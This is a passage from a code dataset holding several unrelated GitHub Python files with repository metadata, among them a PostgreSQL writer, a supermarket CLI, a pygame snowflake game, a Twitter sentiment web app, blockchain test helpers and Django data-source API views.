Solution()\nprint(solution.flipAndInvertImage([[1,1,0],[1,0,1],[0,0,0]]))\nprint(solution.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))","repo_name":"MeongGanas/leetcode-python","sub_path":"easy/Flipping_an_Image.py","file_name":"Flipping_an_Image.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33513323343","text":"\"\"\"This is the general PostgreSQL writer.\n\n:author: gkathuria\n:date: March 31, 2014\n\"\"\"\n\nimport psycopg2\n\nimport data_generation.writers.datefilters as writers_filters\nimport data_generation.writers.util as writers_util\n\n\navailable_filters = writers_filters.FILTERS\n\n\ndef register_filters(filters):\n \"\"\"Add custom filters to the CSV writer filtering register.\n\n :param filters: A dictionary of filters to register\n \"\"\"\n global available_filters\n available_filters = dict(list(available_filters.items()) + list(filters.items()))\n\n\ndef create_dbcon(host, port, dbname, user, password):\n conn_string = \"host=%s port=%s dbname=%s user=%s password=%s\" %(host,port,dbname,user,password)\n print(\"connecting to database %s\" %conn_string)\n conn = psycopg2.connect(conn_string)\n return conn\n\n\ndef create_table(conn, tblname, columns=None):\n \"\"\"Create the table with columns and types provided in Postgres database\n\n :param conn: Connection to PostgresSQL database created using create_dbconn\n :param table: Name of the table\n :param columns: The columns that define the structure of the table\n \"\"\"\n cursor = conn.cursor()\n\n stmt=''\n for c in columns:\n colnametype = c['name']+' '+c['type']\n stmt = stmt+colnametype+','\n\n print(\"drop table if exists %s\" % tblname[:-4])\n print(\"create table %s (%s)\" % (tblname[:-4], stmt[:-1]))\n\n cursor.execute(\"drop table if exists %s\" % tblname[:-4])\n cursor.execute(\"create table %s (%s)\" % (tblname[:-4], stmt[:-1]))\n\n conn.commit()\n\n\ndef write_records_to_table(conn, tbl_name, columns, entities, entity_filter=None):\n \"\"\"For a list of entity objects, write a record to an output path. This requires that the objects in the entities\n parameter have a 'get_object_set' method that returns a dictionary of objects whose attributes are available.\n\n :param conn: Connection to PostgresSQL database created using create_dbconn\n :param tbl_name: Name of table this row is being generated for (optional). This is used to generate unique record\n ID values that are unique within a given table.\n :param columns: The dictionary of columns for data values to write for each entity\n :param entities: A list of entity objects to write out to the table\n :param entity_filter: An (attribute, value) tuple that will be evaluated against each object in entities to see if\n that object should be written to the table. If not provided, all entities are written to file.\n The attribute is expected to be directly on the entity and is not checked (will raise an\n exception if not present).\n \"\"\"\n cursor = conn.cursor()\n\n num_col = len([i['name'] for i in columns])\n tbl_ins = \"insert into %s (%s) values\" % (tbl_name, ', '.join(column['name'] for column in columns))\n\n lst = ['%s' for _ in range(num_col)]\n col_list = ','.join(lst)\n\n stmt = tbl_ins + '('+col_list+')'\n\n # Get each row of data\n params = []\n for entity in entities:\n if entity_filter is None or getattr(entity, entity_filter[0]) == entity_filter[1]:\n params.append(writers_util.build_csv_row_values(entity.get_object_set(), columns, available_filters,\n tbl_name))\n\n # Write all rows\n try:\n cursor.executemany(stmt, params)\n\n except psycopg2.DataError as e:\n print(\"NAME: \", tbl_name)\n print(\"#COLS:\", num_col)\n print(\"STMT: \", stmt)\n print(\"PARAMS: \", tuple(zip((column['name'] for column in columns), params[0])))\n raise\n\n except psycopg2.IntegrityError as e:\n print(\"NAME: \", tbl_name)\n print(\"#COLS:\", num_col)\n print(\"STMT: \", stmt)\n print(\"PARAMS: \", tuple(zip((column['name'] for column in columns), params[0])))\n raise\n\n # Cleanup\n cursor.close()\n conn.commit()\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"data_gen/data_generation/writers/writepostgres.py","file_name":"writepostgres.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"576678139","text":"#定义仓库\nrepository = dict()\n#定义购物清单对象\nshop_list= []\n\n#定义一个函数来初始化商品\ndef init_repository():\n #初始化很多商品,每个元组代表一个商品\n goods1 = (\"1000001\", \"疯狂Ruby讲义\", 88.0)\n goods2 = (\"1000002\", \"疯狂Swift讲义\", 69.0)\n goods3 = (\"1000003\", \"疯狂Kotlin讲义\", 59.0)\n goods4 = (\"1000004\", \"疯狂JAVA讲义\", 109.0)\n goods5 = (\"1000005\", \"疯狂Android讲义\", 108.0)\n goods6 = (\"1000006\", \"疯狂IOS讲义\", 77.0)\n #把商品放入库中\n repository[goods1[0]] = goods1\n repository[goods2[0]] = goods2\n repository[goods3[0]] = goods3\n repository[goods4[0]] = goods4\n repository[goods5[0]] = goods5\n repository[goods6[0]] = goods6\n#显示超时的商品清单,就是遍历代表仓库的dict字典\ndef show_goods():\n print(\"欢迎光临 疯狂超市\")\n print(\"疯狂超市的商品清单\")\n print(\"%13s%40s%10s\"%(\"条码\", \"商品名称\", \"单价\"))\n #遍历repository中所有value来显示商品清单\n for goods in repository.values():\n print(\"%15s%40s%12s\" % goods)\n#显示购物清单,就是遍历代表购物清单的list的列表\ndef show_list():\n print('=' * 100)\n #如果清单不为空,则输出清单内容\n if not shop_list:\n print(\"还未购买商品\")\n else:\n title = \"%-5s|%15s|%40s|%10s|%4s|%10s\" % \\\n (\"ID\", \"条码\", \"商品名称\", \"单价\", \"数量\", \"小计\")\n print(title)\n print(\"-\" * 100)\n #记录总计的价钱\n sum = 0\n #遍历代表购物清单的list列表\n for i, item in enumerate(shop_list):\n #转换id为索引加1\n id = i + 1\n #获取该购物明细的第1个元素:商品条码\n code = item[0]\n #获取商品条码读取商品,再获取商品名称\n name = repository[code][1]\n #获取商品条码读取商品,再获取商品单价\n price = repository[code][2]\n #获取该购物明细项的第二个元素:商品数量\n number = item[1]\n #小计\n amount = price * number\n #计算总计\n sum = sum + amount\n line = \"%-5s|%17s|%40s|%12s|%6s|%12s\" % \\\n (id, code, name, price, number, amount)\n print(line)\n print(\"-\" * 100)\n print(\" 总计:\", sum)\n print(\"=\" * 100)\n#添加购买的商品,就是想代表用户购物清单的list列表中添加一项\ndef add():\n #等待输入条码\n code = input(\"请输入商品条码:\\n\" )\n #如果没有找到条码,条码错误\n if code not in repository:\n print(\"条码错误,请重新输入\")\n return\n #根据条码找商品\n goods = repository[code]\n #等待输入数量\n number = input(\"输入你要购买的数量:\\n\")\n #把商品和购买的数量封装成list后加入购物车清单中\n shop_list.append([code,int(number)])\n#修改购买商品的数量,就是修改代表用户购物清单的list列表元素\ndef edit():\n id = input(\"请输入要修改的购物明细项目的ID:\\n\")\n #id减1得到购物明细项目的索引\n index = int(id) - 1\n #根据索引获取某个购物明细项\n item = shop_list[index]\n #提示输入新的购买数量\n number = input(\"请输入重新购买的数量:\\n\")\n #修改item里的number\n item[1] = int(number)\n#删除以后买的商品明细项,就是删除代表用户购物清单的list列表的元素\ndef delete():\n id = input(\"请输入要删除的购物明细项的ID:\")\n index= int(id) - 1\n #直接根据所从清单里面删除购物明细项\n del shop_list[index]\ndef payment():\n show_list()\n print('\\n' * 3)\n print(\"欢迎下次光临\")\n #退出程序\n import os\n os._exit(0)\ncmd_dict = {'a': add, 'e': edit, 'd': delete, 'p': payment, 's':show_list}\n#显示命令提示\ndef show_command():\n #等待命令\n cmd = input(\"请输入指令:\\n\" +\n \"添加(a) 修改(e) 删除(d) 结算(p) 超市商品(s) \\n\")\n #如果用户输入的字符串没有对应的命令\n if cmd not in cmd_dict:\n print(\"不要玩!\")\n else:\n cmd_dict[cmd]()\ninit_repository()\nshow_goods()\n#显示清单和操作命令提示\nwhile True:\n show_list()\n show_command()","repo_name":"ChenFu0420/leranpython","sub_path":"4parts/supermarket.py","file_name":"supermarket.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39840673987","text":"import pygame\r\nimport sys\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Proste ustawienai okna gry oraz nazwa\r\nwidth, height = 800, 600\r\nscreen = pygame.display.set_mode((width, height))\r\npygame.display.set_caption(\"Topienie Śniegu\")\r\n\r\n# kolory które będą używane podczas gry\r\nwhite = (255, 255, 255)\r\nblack = (0, 0, 0)\r\n\r\n# ustawienia płatka sniegu\r\nsnowflake_size = 40\r\nsnowflake_color = (255, 255, 255)\r\nsnowflakes = []\r\n\r\n# ustawienie gry na stan poczatkowy\r\nclock = pygame.time.Clock()\r\ngame_over = False\r\nscore = 0\r\n\r\nwhile not game_over: # prosta petla ktora dziala do czasu aż nie zostanie spełniony warunek quit. W ifie sprawdzamy po prostu czy klikniecie\r\n for event in pygame.event.get(): # uzytkownika zawiera sie w rozmiarze naszego platka sniegu, jesli tak score idzie w gore\r\n if event.type == pygame.QUIT: # a platek jest kasowany, jesli nie to warunek quit jest spelniony i game_over ustawia sie na true co konczy rozgrywke\r\n game_over = True\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n mouse_x, mouse_y = pygame.mouse.get_pos()\r\n for snowflake in snowflakes:\r\n if (\r\n snowflake[0] < mouse_x < snowflake[0] + snowflake_size\r\n and snowflake[1] < mouse_y < snowflake[1] + snowflake_size\r\n ):\r\n score += 1\r\n snowflakes.remove(snowflake)\r\n\r\n # dodawanie platkow sniegu, czestotliwosc generowania oraz losowe rozmieszczanie u gory ekranu\r\n if random.randint(0, 100) < 7:\r\n snowflakes.append([random.randint(0, width - snowflake_size), 0])\r\n\r\n # aktualizowanie pozycji platkow sniegu - innymi slowy proces ich spadku\r\n for snowflake in snowflakes:\r\n snowflake[1] += 2\r\n if snowflake[1] > height: # jesli platek spadnie \"poza\" ekran gra sie konczy\r\n game_over = True\r\n\r\n # rysowanie tla gry\r\n screen.fill(black)\r\n\r\n # samo w sobie rysowanie platkow sniegu\r\n for snowflake in snowflakes:\r\n pygame.draw.rect(screen, snowflake_color, (snowflake[0], int(snowflake[1]), snowflake_size, snowflake_size))\r\n\r\n # scoreboard w lewym gornym rogu rozgrywki\r\n font = pygame.font.Font(None, 36)\r\n score_text = font.render(f\"Score: {score}\", True, white)\r\n screen.blit(score_text, (10, 10))\r\n\r\n pygame.display.flip()\r\n clock.tick(24) # ilosc klatek\r\n\r\n# Zakończenie gry\r\npygame.quit()\r\nsys.exit()\r\n","repo_name":"Dawid141/Python2023","sub_path":"cw_9/snowflakes.py","file_name":"snowflakes.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15384584825","text":"import threading\nfrom time import sleep\ndef sum():\n j=0\n for i in range(1,6):\n print(i)\n j = j+i\n sleep(1)\n print(j)\n\ndef factorial(num):\n mul =1\n for i in range(1,num+1):\n print(i)\n mul = mul*i\n sleep(1)\n print(mul)\nthread = threading.Thread(target=sum)\nthread2 = threading.Thread(target=factorial,args=(5,))\nthread.start()\nthread2.start()\nthread.join()\nthread2.join()\n#print(sum())\n#print(factorial(5))\nprint(\"Executed\")","repo_name":"iPalashAcharya/PythonLearning","sub_path":"oops/threading_numbers.py","file_name":"threading_numbers.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10376477257","text":"import os\nimport asyncio\nimport pathlib\nimport random\nimport string\nimport time\nimport typing as tp\n\nimport sha3\nimport solcx\nfrom eth_abi import abi\nfrom eth_utils import keccak\nfrom pythclient.pythaccounts import PythPriceAccount\nfrom pythclient.solana import SolanaClient, SolanaPublicKey, SOLANA_MAINNET_HTTP_ENDPOINT\n\n\ndef get_sol_price() -> float:\n \"\"\"Get SOL price from Solana mainnet\"\"\"\n\n async def get_price():\n account_key = SolanaPublicKey(\"H6ARHf6YXhGYeQfUzQNGk6rDNnLBQKrenN712K4AQJEG\")\n solana_client = SolanaClient(endpoint=SOLANA_MAINNET_HTTP_ENDPOINT)\n price: PythPriceAccount = PythPriceAccount(account_key, solana_client)\n await price.update()\n await solana_client.close()\n return price.aggregate_price\n\n result = asyncio.run(get_price())\n return result\n\n\ndef get_contract_abi(name, compiled):\n for key in compiled.keys():\n if name == key.rsplit(\":\")[-1]:\n return compiled[key]\n\n\ndef get_contract_interface(contract: str, version: str, contract_name: tp.Optional[str] = None,\n import_remapping: tp.Optional[dict] = None):\n if not contract.endswith(\".sol\"):\n contract += \".sol\"\n if contract_name is None:\n if \"/\" in contract:\n contract_name = contract.rsplit(\"/\", 1)[1].rsplit(\".\", 1)[0]\n else:\n contract_name = contract.rsplit(\".\", 1)[0]\n\n if version not in [str(v) for v in solcx.get_installed_solc_versions()]:\n solcx.install_solc(version)\n if contract.startswith(\"/\"):\n contract_path = pathlib.Path(contract)\n else:\n contract_path = (pathlib.Path.cwd() / \"contracts\" / f\"{contract}\").absolute()\n if not contract_path.exists():\n contract_path = (pathlib.Path.cwd() / \"contracts\" / \"external\" / f\"{contract}\").absolute()\n\n assert contract_path.exists(), f\"Can't found contract: {contract_path}\"\n\n compiled = solcx.compile_files([contract_path],\n output_values=[\"abi\", \"bin\"],\n solc_version=version,\n import_remappings=import_remapping,\n allow_paths=[\".\"],\n optimize=True\n ) # this allow_paths isn't very good...\n contract_interface = get_contract_abi(contract_name, compiled)\n\n return contract_interface\n\n\ndef gen_hash_of_block(size: int) -> str:\n \"\"\"Generates a block hash of the given size\"\"\"\n try:\n block_hash = hex(int.from_bytes(os.urandom(size), \"big\"))\n if len(block_hash[2:]) == size * 2:\n return block_hash\n else:\n return gen_hash_of_block(size)\n except ValueError:\n return gen_hash_of_block(size)\n\n\ndef generate_text(min_len: int = 2, max_len: int = 200, simple: bool = True) -> str:\n length = random.randint(min_len, max_len)\n if simple:\n chars = string.ascii_letters + string.digits\n else:\n chars = string.printable[:-5]\n return ''.join(random.choice(chars) for _i in range(length)).strip()\n\n\ndef wait_condition(func_cond, timeout_sec=15, delay=0.5):\n start_time = time.time()\n while True:\n if time.time() - start_time > timeout_sec:\n raise TimeoutError(f\"The condition not reached within {timeout_sec} sec\")\n try:\n if func_cond():\n break\n except Exception as e:\n print(f\"Error during waiting: {e}\")\n time.sleep(delay)\n return True\n\n\ndef decode_function_signature(function_name: str, args=None) -> str:\n data = keccak(text=function_name)[:4]\n if args is not None:\n types = function_name.split(\"(\")[1].split(\")\")[0].split(\",\")\n data += abi.encode(types, args)\n return \"0x\" + data.hex()\n\n\ndef get_selectors(abi):\n \"\"\"Get functions signatures with params as keccak256 from contract abi\"\"\"\n selectors = []\n for function in filter(lambda item: item[\"type\"] == \"function\", abi):\n input_types = \"\"\n for input in function[\"inputs\"]:\n if 'struct' in input[\"internalType\"]:\n struct_name = input[\"name\"]\n struct_types = \",\".join(i[\"type\"] for i in input[\"components\"] if i[\"name\"] != struct_name)\n input_types += \",\" + f\"({struct_types})[]\"\n else:\n input_types += \",\" + input[\"type\"]\n\n input_types = input_types[1:]\n keccak256 = sha3.keccak_256()\n keccak256.update(f\"{function['name']}({input_types})\".encode())\n encoded_selector = f\"{function['name']}({input_types})\"\n selectors.append(keccak(text=encoded_selector)[:4])\n return selectors\n","repo_name":"neonevm/neon-tests","sub_path":"utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41608496260","text":"import cv2 \r\n## we import opencv as cv2 because the devlopers named the pakage/module as cv2 \r\n\r\nimg1 = cv2.imread(\"C:\\\\Users\\\\naincy\\\\Desktop\\\\DATA_SET_\\\\BEACH.jpg\",1) \r\n#always remmember to add // while writting an path else it will relese an error\r\n\r\nimg1 = cv2.resize(img1,(1200,1200))\r\n ## resize your image if needed\r\n\r\ncv2.imshow(\"orignal\",img1)\r\n # here \" orignal \" is our window name where we'll see our image \r\n\r\ncv2.waitKey() \r\n# it holds the output window. we can add any integer number here . if we want aur output to be visable for 3 sec only than we can add 3 as it's parametere \r\n\r\ncv2.destroyAllWindows()\r\n # cleres the priviously done operations\r\n","repo_name":"naincy1927/COMPUTER_VISION","sub_path":"coloured_image.py","file_name":"coloured_image.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18030861569","text":"from bottle import route,run\nimport bottle\nfrom joblib import load\nfrom get_tweets import get_related_tweets\nimport pandas as pd\nimport simplejson as json\nimport os\n\n\npipeline = load(\"text_classification.joblib\")\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\n\ndef requestResults(name):\n tweets = get_related_tweets(name)\n tweets['prediction'] = pipeline.predict(tweets['tweet_text'])\n data = str(tweets.prediction.value_counts()) + '\\n\\n'\n return data + str(tweets)\n\n\napp= bottle.Bottle()\n\nbottle.TEMPLATE_PATH.insert(0,\"./\")\n\n@route('/', method=['POST', 'GET'])\ndef hello():\n if bottle.request.method == 'POST':\n user = str(bottle.request.body.read().decode(\"utf-8\"))\n user = user.split(\"=\")\n return bottle.redirect('/success/'+user[1])\n else:\n return bottle.template(\"./templates/home.html\")\n\n@route('/success/')\ndef success(name):\n return \"\" + str(requestResults(name)) + \" \"\n\nif os.environ.get('APP_LOCATION') == 'heroku':\n run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\nelse:\n run(host='localhost', port=3000, debug=True)\n","repo_name":"SeptianRin/twit_clf","sub_path":"get_sentiment.py","file_name":"get_sentiment.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21073848682","text":"import numpy as np\nimport pandas as pd\nimport math\n\ndef calc_perc_externe_interne_samenwerking(G, organisatie_eenheid, vaste_staf_df, verbose=False):\n \n organisatie_eenheid_meervoud = 'onderzoekslijnen'\n if organisatie_eenheid == 'Research Unit':\n organisatie_eenheid_meervoud = 'research units'\n\n\n # paar dingen nodig:\n # per affiliation (dat is een value binnen organisatie_eenheid):\n # telling van aantal personen binnen deze affiliation (om te normaliseren)\n # telling van aantal \n unique_affiliations = vaste_staf_df[organisatie_eenheid].unique()\n all_metrics = [f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}',\n f'Samenwerkingen binnen {organisatie_eenheid.lower()}',\n f'Samenwerkingen tussen {organisatie_eenheid_meervoud}',\n f'Aantal stafleden binnen {organisatie_eenheid.lower()}',\n f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen']\n result = pd.DataFrame(index=unique_affiliations,\n columns=all_metrics,\n data=np.zeros((len(unique_affiliations), len(all_metrics))))\n\n if verbose:\n print(result)\n\n for affiliation in unique_affiliations:\n\n # all nodes with that affiliation\n aff_nodes = [node for node, aff in G.nodes(data=organisatie_eenheid) if aff == affiliation]\n\n result.loc[affiliation, f'Aantal stafleden binnen {organisatie_eenheid.lower()}'] = len(aff_nodes)\n # result[affiliation] = {f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}': 0,\n # f'Samenwerkingen binnen {organisatie_eenheid.lower()}': 0,\n # f'Samenwerkingen tussen {organisatie_eenheid_meervoud}': 0,\n # f'Aantal stafleden binnen {organisatie_eenheid.lower()}': len(aff_nodes)}\n\n for node in aff_nodes:\n\n # bereken de som van alle interne samenwerkingen (weights van inner edges)\n # voor deze node en deel door 2 omdat anders de inner nodes van een organisatie_eenheid/affiliation\n # dubbel geteld worden\n weights_inner_edges = [d['weight'] for u, v, d in G.edges(node, data=True) if d['is_inner'] == 1]\n aff_inner_sum = sum(weights_inner_edges) / 2 # /2 omdat we anders de inner edges dubbel tellen\n result.loc[affiliation, f'Samenwerkingen binnen {organisatie_eenheid.lower()}'] += aff_inner_sum\n\n # som van alle samenwerkingen across organisatie_eenheid\n weights_outer_edges = [d['weight'] for u, v, d in G.edges(node, data=True) if d['is_outer'] == 1]\n aff_outer_sum = sum(weights_outer_edges)\n result.loc[affiliation, f'Samenwerkingen tussen {organisatie_eenheid_meervoud}'] += aff_outer_sum\n\n # totale samenwerkingen\n result.loc[affiliation, f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}'] += aff_inner_sum + aff_outer_sum \n\n if verbose:\n print(node)\n print('edges van node: ', G.edges(node, data=True))\n print()\n print('weights van inner edges (dus alle interne samenwerkingen van deze persoon', weights_inner_edges)\n print()\n print(result)\n print()\n print()\n try:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = round(100 * result.loc[affiliation, f'Samenwerkingen tussen {organisatie_eenheid_meervoud}'] / result.loc[affiliation, f'Alle samenwerkingen binnen {organisatie_eenheid.lower()}']) \n except ZeroDivisionError:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = 0\n except ValueError:\n result.loc[affiliation, f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = np.nan\n\n \n result[f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'] = [f'{d}%' if not math.isnan(d) else 'n.v.t.' for d in result[f'Percentage samenwerking tussen {organisatie_eenheid_meervoud} (van alle samenwerkingen'].values] \n\n \n result = result.style.format(\"{:.0f}\", subset=all_metrics[:-1])\n\n return result","repo_name":"NHameleers/heidag_netwerken","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459760731","text":"# Topological Sort\n\nclass Graph:\n def __init__(self, gdict = None):\n if not gdict:\n self.dict = dict()\n else:\n self.dict = gdict\n\n def addEdge(self, node1, node2):\n if not node1 in self.dict.keys():\n self.dict[node1] = list()\n\n if not node2 in self.dict[node1]:\n self.dict[node1].append(node2)\n\n\n \n def topologicalSortUtil(self, v, visited, stack):\n visited.append(v)\n\n if not v in self.dict.keys():\n self.dict[v] = list()\n\n for i in self.dict[v]:\n if i not in visited:\n self.topologicalSortUtil(i, visited, stack)\n\n stack.insert(0, v)\n\n\n def topologicalSort(self):\n visited = list()\n stack = list()\n for k in list(self.dict):\n if not k in visited:\n self.topologicalSortUtil(k, visited, stack)\n print(stack)\n\n\n\ngraph = Graph()\ngraph.addEdge(\"A\", \"C\")\ngraph.addEdge(\"C\", \"E\")\ngraph.addEdge(\"E\", \"H\")\ngraph.addEdge(\"E\", \"F\")\ngraph.addEdge(\"F\", \"G\")\ngraph.addEdge(\"B\", \"D\")\ngraph.addEdge(\"B\", \"C\")\ngraph.addEdge(\"D\", \"F\")\n\ngraph.topologicalSort()\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"11-Graph/TopologicalSort.py","file_name":"TopologicalSort.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28063633517","text":"import Map\nimport StatParser\nwoodList = []\nwoodLeft = []\nmineralList = []\nmineralLeft = []\n\n# Puts all trees and ores into lists for later\ndef findMaterials():\n global woodList\n global mineralList\n for x in range(len(Map.map)):\n for y in range(len(Map.map[x])):\n if Map.map[x][y] == \"T\":\n woodList.append([x, y])\n woodLeft.append([x, y, 0])\n if Map.map[x][y] == \"I\":\n mineralList.append((x, y))\n mineralLeft.append((x, y))\n\n# Checks if wood can be collected\ndef gatherWood(agent):\n for i in range(len(woodList)):\n # If agent is standing on wood\n if agent.getPos() == (woodList[i][0], woodList[i][1]):\n treeGone = True\n # If wood has no charges left, change texture and remove from list\n for j in range(len(woodLeft)):\n if woodList[i] == [woodLeft[j][0], woodLeft[j][1]]:\n treeGone = False\n break\n if treeGone:\n Map.changeMap(\"t\", (woodList[i][0], woodList[i][1]))\n return True\n return False\n\n# Tells lists that a tree has been found and will be cut down\ndef treeFound(pos):\n for i in range(len(woodLeft)):\n if pos == (woodLeft[i][0], woodLeft[i][1]):\n woodLeft[i][2] += 1\n if woodLeft[i][2] >= StatParser.statDict[\"treeLife\"]:\n woodLeft.pop(i)\n break\n\n# Checks if ores can be collected\ndef gatherMinerals(agent):\n # If the world is out of ores, become woodcutter\n if not mineralLeft:\n agent.setJob(\"woodCutter\")\n return False\n # When agent stands on ore and is planning to pick it up, remove it from list and change texture\n for i in range(len(mineralList)):\n if agent.getPos() == (mineralList[i][0], mineralList[i][1]):\n if not agent.getPath():\n Map.changeMap(\"M\", (mineralList[i][0], mineralList[i][1]))\n mineralList.remove((mineralList[i][0], mineralList[i][1]))\n agent.setInventory(\"minerals\")\n return True\n return False\n\n# Tells lists that an ore has been found and will be collected\ndef mineralFound(pos):\n for i in range(len(mineralLeft)):\n if pos == mineralLeft[i]:\n mineralLeft.pop(i)\n break\n\n","repo_name":"oscstr-9/Datorspels-AI---S0006D","sub_path":"Lab3/Resources.Py","file_name":"Resources.Py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7273920096","text":"import json\nimport mimetypes\nimport os\nimport uuid\nfrom wsgiref.util import FileWrapper\n\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.core.files.storage import default_storage\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import views, response\nfrom rest_framework import permissions\nfrom rest_framework.parsers import FileUploadParser\nfrom rest_framework.response import Response\n\nimport data_scout\n\nfrom ..views.iam import ProjectModelView\nfrom ..serializers import DataSourceSerializer, UserFileSerializer, DataSourceFolderSerializer, JoinSerializer\nfrom ..models import DataSource, UserFile, DataSourceFolder, Join\n\n\ndef _is_int(val):\n try:\n int(val)\n return True\n except:\n return False\n\n\nclass DataSourceViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows users to be viewed or edited.\n \"\"\"\n queryset = DataSource.objects.all()\n serializer_class = DataSourceSerializer\n\n def _make_schema(self, request):\n \"\"\"\n Generate a schema for this data source (column names and types).\n\n :param request:\n :return:\n \"\"\"\n # We try if the data source actually works and what the data schema looks like\n definition = {\"use_sample\": True,\n \"sampling_technique\": \"top\",\n \"column_types\": True}\n data_source = {\"source\": request.data[\"source\"], \"kwargs\": json.loads(request.data[\"kwargs\"])}\n\n scout = data_scout.scout.Scout()\n ds = scout.get_data_source(data_source[\"source\"])\n # Sometimes a data source is created that isn't ready to be tested (e.g. because the files still need to be\n # uploaded.\n ready = True\n for field_name, field in ds.fields.items():\n if field[\"type\"] == \"file\":\n if field_name in data_source[\"kwargs\"] and _is_int(data_source[\"kwargs\"][field_name]):\n user_file = UserFile.objects.get(pk=data_source[\"kwargs\"][field_name])\n data_source[\"kwargs\"][field_name] = os.path.join(settings.MEDIA_ROOT, user_file.file_name)\n else:\n ready = False\n if ready:\n definition[\"data_source\"] = data_source\n definition[\"pipeline\"] = []\n records, columns = scout.execute_json(definition, data_scout.executor.PandasExecutor)\n request.data[\"schema\"] = json.dumps(columns[-1])\n return request\n\n def update(self, request, *args, **kwargs):\n request = self._make_schema(request)\n return super().update(request, *args, **kwargs)\n\n def create(self, request, *args, **kwargs):\n request = self._make_schema(request)\n return super().create(request, *args, **kwargs)\n\n\nclass UserFileViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows user files to be viewed or edited.\n \"\"\"\n queryset = UserFile.objects.all()\n serializer_class = UserFileSerializer\n\n def get(self, user_file: int):\n return JsonResponse({\"user_file\": user_file})\n\n def retrieve(self, request, pk=None, **kwargs):\n \"\"\"\n Retrieve the user file. If the \"output\" get parameter is set to file, it will return a raw file. If it's set to\n JSON (which is the default), it will return the userfile object as JSON.\n \"\"\"\n user_file = get_object_or_404(self.queryset, pk=pk)\n if request.query_params.get(\"output\", \"json\") == \"file\":\n with default_storage.open(user_file.file_name) as f:\n res = HttpResponse(FileWrapper(f), content_type=mimetypes.guess_type(user_file.original_file_name))\n res['Content-Disposition'] = f\"attachment; filename={user_file.original_file_name}\"\n return res\n else:\n serializer = self.serializer_class(user_file)\n return Response(serializer.data)\n # TODO: Add some sort of on delete to delete the accompanying file\n\n def get_queryset(self):\n queryset = self.queryset.filter(project=self.request.user.profile.project.project)\n return queryset\n\n\nclass UserFileUploadView(views.APIView):\n \"\"\"\n This view allows the user to upload files.\n \"\"\"\n parser_classes = [FileUploadParser]\n queryset = UserFile.objects.all()\n permission_classes = [permissions.IsAuthenticated]\n\n def put(self, request, user_file_id: int, format=None):\n \"\"\"\n Upload a file to the default storage location and attach it to the userfile object that was created earlier.\n\n :param request:\n :param user_file_id: The user file object id to attach this file to.\n :param format:\n :return:\n \"\"\"\n file_name = str(uuid.uuid4())\n user_file = get_object_or_404(UserFile, pk=user_file_id)\n\n # If there's already a file, we'll delete it\n if user_file.file_name is not None and default_storage.exists(user_file.file_name):\n default_storage.delete(user_file.file_name)\n\n file_obj = request.data['file']\n default_storage.save(file_name, ContentFile(file_obj.read()))\n user_file.file_name = file_name\n user_file.original_file_name = request.data['file'].name\n user_file.save()\n\n serializer = UserFileSerializer(user_file, many=False)\n return Response(serializer.data)\n\n\nclass DataSourceTypesView(views.APIView):\n permission_classes = (permissions.IsAuthenticated,)\n\n def get(self, request):\n \"\"\"\n Get an overview of all available data source types.\n \"\"\"\n scout = data_scout.scout.Scout()\n data_source_types = scout.data_sources\n serialized = []\n for data_source_type in data_source_types.values():\n serialized.append({\"name\": data_source_type.__name__, \"fields\": data_source_type.fields})\n\n return response.Response(serialized)\n\n\nclass DataSourceFolderViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows data source folders to be viewed or edited.\n \"\"\"\n queryset = DataSourceFolder.objects.all()\n serializer_class = DataSourceFolderSerializer\n\n\nclass JoinViewSet(ProjectModelView):\n \"\"\"\n API endpoint that allows joins to be viewed or edited.\n \"\"\"\n queryset = 